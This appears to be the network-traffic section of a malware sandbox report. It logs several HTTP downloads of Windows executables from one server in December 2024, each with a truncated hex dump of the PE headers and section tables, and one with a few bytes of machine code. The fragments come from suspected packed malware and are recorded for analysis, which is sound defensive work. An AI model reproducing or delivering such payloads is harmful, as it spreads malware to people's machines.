00 40 00 00 40 2e 64 61 74 61 00 00 00 f0 1a 00 00 00 c0 27 00 00 0a 00 00 00 a0 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 66 70 74 61 62 6c 65 80 00 00 00 00 e0 27 00 00 02 00 00 00 aa 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 7d 9e 00 00 00 f0 27 00 00 a0 00 00 00 ac 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 b8 6a 00 00 00 90 28 00 00 6c 00 00 00 4c 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 22 Dec 2024 01:16:21 GMTContent-Type: application/octet-streamContent-Length: 776832Last-Modified: Tue, 17 Dec 2024 09:45:14 GMTConnection: keep-aliveETag: "6761482a-bda80"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 09 00 a3 1e 60 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 00 00 aa 01 00 00 c0 00 00 00 00 00 00 52 59 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 0c 00 00 08 00 00 00 00 00 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 37 02 00 3c 00 00 00 00 a0 02 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 ac 0b 00 80 2e 00 00 00 b0 02 00 40 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 fe 01 00 18 00 00 00 e8 cd 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 28 39 02 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9c a8 01 00 00 10 00 00 00 aa 01 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 24 8b 00 00 00 c0 01 00 00 8c 00 00 00 b2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 22 00 00 00 50 02 00 00 16 00 00 00 3e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 53 00 00 00 00 53 00 00 00 00 80 02 00 00 02 00 00 00 54 02 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 6c 73 00 00 00 00 09 00 00 00 00 90 02 00 00 02 00 00 00 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 00 00 00 00 a0 02 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 40 19 00 00 00 b0 02 00 00 1a 00 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 73 00 00 00 00 00 9c 04 00 00 d0 02 00 00 9c 04 00 00 74 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 00 9c 04 00 00 70 07 00 00 9c 04 00 00 10 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 22 Dec 2024 01:16:28 GMTContent-Type: application/octet-streamContent-Length: 1861632Last-Modified: Thu, 19 Dec 2024 20:35:58 GMTConnection: keep-aliveETag: "676483ae-1c6800"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 ae 00 00 00 00 00 00 00 50 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 49 00 00 04 00 00 49 41 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 20 05 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 10 05 00 00 10 00 00 00 48 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 01 00 00 00 20 05 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 30 05 00 00 02 00 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2a 00 00 40 05 00 00 02 00 00 00 5c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 65 6b 63 61 7a 62 6f 00 f0 19 00 00 50 2f 00 00 e2 19 00 00 5e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 74 6c 6c 6f 7a 63 76 00 10 00 00 00 40 49 00 00 06 00 00 00 40 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 49 00 00 22 00 00 00 46 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 22 Dec 2024 01:16:37 GMTContent-Type: application/octet-streamContent-Length: 439296Last-Modified: Sat, 21 Dec 2024 08:14:10 GMTConnection: keep-aliveETag: "676678d2-6b400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 dd b6 42 53 99 d7 2c 00 99 d7 2c 00 99 d7 2c 00 8d bc 2f 01 94 d7 2c 00 8d bc 29 01 23 d7 2c 00 cb a2 28 01 8b d7 2c 00 cb a2 2f 01 8f d7 2c 00 cb a2 29 01 c0 d7 2c 00 a8 8b d1 00 9b d7 2c 00 8d bc 28 01 8e d7 2c 00 8d bc 2d 01 8a d7 2c 00 99 d7 2d 00 6a d7 2c 00 55 a2 25 01 98 d7 2c 00 55 a2 d3 00 98 d7 2c 00 55 a2 2e 01 98 d7 2c 00 52 69 63 68 99 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 01 33 64 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 00 02 00 00 00 00 00 27 a0 02 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 07 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 80 45 06 00 c8 00 00 00 00 d0 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 06 00 c0 45 00 00 e0 e1 05 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e3 05 00 18 00 00 00 18 e2 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 05 00 3c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6a f1 04 00 00 10 00 00 00 f2 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 90 48 01 00 00 10 05 00 00 4a 01 00 00 f6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 dc 6d 00 00 00 60 06 00 00 2c 00 00 00 40 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 d0 06 00 00 02 00 00 00 6c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c0 45 00 00 00 e0 06 00 00 46 00 00 00 6e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 22 Dec 2024 01:16:43 GMTContent-Type: application/octet-streamContent-Length: 605696Last-Modified: Thu, 12 Dec 2024 15:01:10 GMTConnection: keep-aliveETag: "675afab6-93e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4d 93 ba 99 09 f2 d4 ca 09 f2 d4 ca 09 f2 d4 ca 42 8a d7 cb 0c f2 d4 ca 42 8a d1 cb b6 f2 d4 ca 19 76 d7 cb 03 f2 d4 ca 19 76 d0 cb 18 f2 d4 ca 42 8a d2 cb 08 f2 d4 ca 19 76 d1 cb 63 f2 d4 ca 52 9a d5 cb 0b f2 d4 ca 42 8a d0 cb 12 f2 d4 ca 42 8a d5 cb 18 f2 d4 ca 09 f2 d5 ca cf f2 d4 ca 42 77 dd cb 0c f2 d4 ca 42 77 2b ca 08 f2 d4 ca 09 f2 43 ca 08 f2 d4 ca 42 77 d6 cb 08 f2 d4 ca 52 69 63 68 09 f2 d4 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 31 b5 31 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 29 00 ee 06 00 00 6c 02 00 00 00 00 00 0c 32 04 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 09 00 00 04 00 00 00 00 00 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 be 08 00 b4 00 00 00 00 60 09 00 48 04 00 00 00 10 09 00 74 4c 00 00 00 00 00 00 00 00 00 00 00 70 09 00 90 0b 00 00 80 04 08 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 06 08 00 28 00 00 00 40 03 08 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 07 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 3e ec 06 00 00 10 00 00 00 ee 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 64 ce 01 00 00 00 07 00 00 d0 01 00 00 f2 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 3b 00 00 00 d0 08 00 00 1c 00 00 00 c2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 74 4c 00 00 00 10 09 00 00 4e 00 00 00 de 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 48 04 00 00 00 60 09 00 00 06 00 00 00 2c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 90 0b 00 00 00 70 09 00 00 0c 00 00 00 32 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 22 Dec 2024 01:16:50 GMTContent-Type: application/octet-streamContent-Length: 4470272Last-Modified: Sun, 22 Dec 2024 00:33:17 GMTConnection: keep-aliveETag: "67675e4d-443600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 c6 e7 66 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 d4 4e 00 00 c6 74 00 00 32 00 00 00 70 c6 00 00 10 00 00 00 f0 4e 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 a0 c6 00 00 04 00 00 2f 58 44 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 10 72 00 73 00 00 00 00 00 72 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc 56 c6 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 56 c6 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 f0 71 00 00 10 00 00 00 a0 28 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 00 72 00 00 02 00 00 00 b0 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 10 72 00 00 02 00 00 00 b2 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 38 00 00 20 72 00 00 02 00 00 00 b4 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 73 6d 6f 71 63 6e 70 00 60 1b 00 00 00 ab 00 00 5a 1b 00 00 b6 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 6b 74 64 6e 6e 64 61 00 10 00 00 00 60 c6 00 00 04 00 00 00 10 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 c6 00 00 22 00 00 00 14 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 22 Dec 2024 01:17:02 GMTContent-Type: application/octet-streamContent-Length: 4433408Last-Modified: Sun, 22 Dec 2024 01:09:57 GMTConnection: keep-aliveETag: "676766e5-43a600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 07 98 63 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 4a 49 00 00 4c 75 00 00 32 00 00 00 d0 c5 00 00 10 00 00 00 60 49 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 c6 00 00 04 00 00 39 49 44 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f b0 72 00 73 00 00 00 00 a0 72 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dc b2 c5 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c b2 c5 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 72 00 00 10 00 00 00 34 28 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 a0 72 00 00 02 00 00 00 44 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 72 00 00 02 00 00 00 46 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 37 00 00 c0 72 00 00 02 00 00 00 48 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 61 73 66 68 6f 65 74 00 40 1b 00 00 80 aa 00 00 36 1b 00 00 4a 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 67 6a 74 65 79 75 72 00 10 00 00 00 c0 c5 00 00 04 00 00 00 80 43 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 c5 00 00 22 00 00 00 84 43 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 22 Dec 2024 01:17:15 GMTContent-Type: application/octet-streamContent-Length: 4438776Last-Modified: Tue, 10 Dec 2024 00:01:52 GMTConnection: keep-aliveETag: "675784f0-43baf8"Accept-Ranges: bytesData Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 e7 a4 44 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 10 4f 00 00 00 00 00 00 00 00 00 00 10 7b 43 00 e8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0e 8e 01 00 00 10 00 00 00 90 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 da 3b 00 00 00 a0 01 00 00 3c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 4d 00 00 00 e0 01 00 00 0a 00 00 00 ce 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 4f 00 00 00 30 02 00 00 50 00 00 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 55 8b ec a1 60 e9 41 00 81 ec 04 09 00 00 53 33 db 3b c3 56 57 74 1f 66 39 1d 62 e9 41 00 74 07 ff d0 a3 60 e9 41 00 50 e8 50 14 00 00 50 e8 ef 84 00 00 59 eb 6e 6a 27 e8 40 14 00 00 8b 75 08 ff 76 0c 8b 3d c0 a2 41 00 ff 36 50 8d 85 fc f6 ff ff 50 ff d7 83 c4 14 39 5e 10 89 5d fc 76 38 8d 5e 14 ff 33 8d 85 fc fe ff ff 68 90 a4 41 00 50 ff d7 83 c4 0c 8d 85 fc fe ff ff 50 8d 85 fc f6 ff ff 50 ff 15 78 a1 41 00 ff 45 fc 8b 45 fc 83 c3 04 3b 46 10 72 cb 8d 85 fc f6 ff ff 50 e8 7e 84 00 00 59 e8 d4 36 00 00 6a 0a ff 15 74 a1 41 00 cc ff 74 24 04 e8 44 ff ff ff cc 56 8b f1 e8 25 73 00 00 c7 06 a0 a4 41 00 c7 46 38 d2 07 00 00 8b c6 5e c3 6a 01 ff 71 04 ff 15 bc a2 41 00 c3 33 c0 39 05 60 ea 41 00 74 07 b8 04 40 00 80 eb 1e 39 44 24 08 74 16 ff 74 24 08 50 